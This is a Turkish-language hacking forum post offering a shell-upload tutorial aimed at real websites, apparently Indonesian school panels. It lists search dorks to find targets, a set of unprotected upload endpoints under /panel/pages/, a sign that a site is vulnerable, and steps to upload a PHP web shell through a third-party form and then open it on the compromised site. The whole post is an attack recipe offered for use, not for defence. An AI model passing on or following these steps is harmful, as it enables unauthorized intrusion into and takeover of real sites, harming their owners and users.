thnxMerhaba spyhackerz ailesi , bugün shell upload exploit anlatacağız .
Öncelikle dorklarımız :View hidden content is available for registered users!
inurl:/panel/pages site:.sch.id "Supported By Beemart"
inurl:/login.php intitle:cbt 2018
Bu dorklar vasıtasıyla siteleri bulduktan sonra site.com/ adresine yani anasayfaya kadar silip exploitimizi yapıştırıyoruz .
Exploit:View hidden content is available for registered users!
/panel/pages/upload_gambar.php /panel/pages/upload-file.php /panel/pages/upload_video.php /panel/pages/upload_audio.php /panel/pages/upload-file.php /panel/pages/upload-fotosiswa.php /panel/pages/upload-banner.php
Sayfaya gittiğimizde blank yani boş beyaz sayfa çıkıyorsa başarılı olmuşuz demektir .
Geriye kalan iş sadece bulduğumuz siteyi php ile yazılmış scripte bırakmak .
Php kod satirları bende mevcut değil o yüzden bu siteden yapacağız :
Target Lu yazan yere site adresimizi post fileye ise de uploadfile vesaire yazabilirsiniz .
Segeltargete bastığınızda yüklemek istediğiniz dosyayı soracaktır yüklediğinizde succes yazan sayfaya atarsa başarıyla up olmuş demektir .
site.com/pictures/shelladı.php şeklinde ulaşabilirsiniz .
Anlamayanlar için İlgili Video :
View hidden content is available for registered users!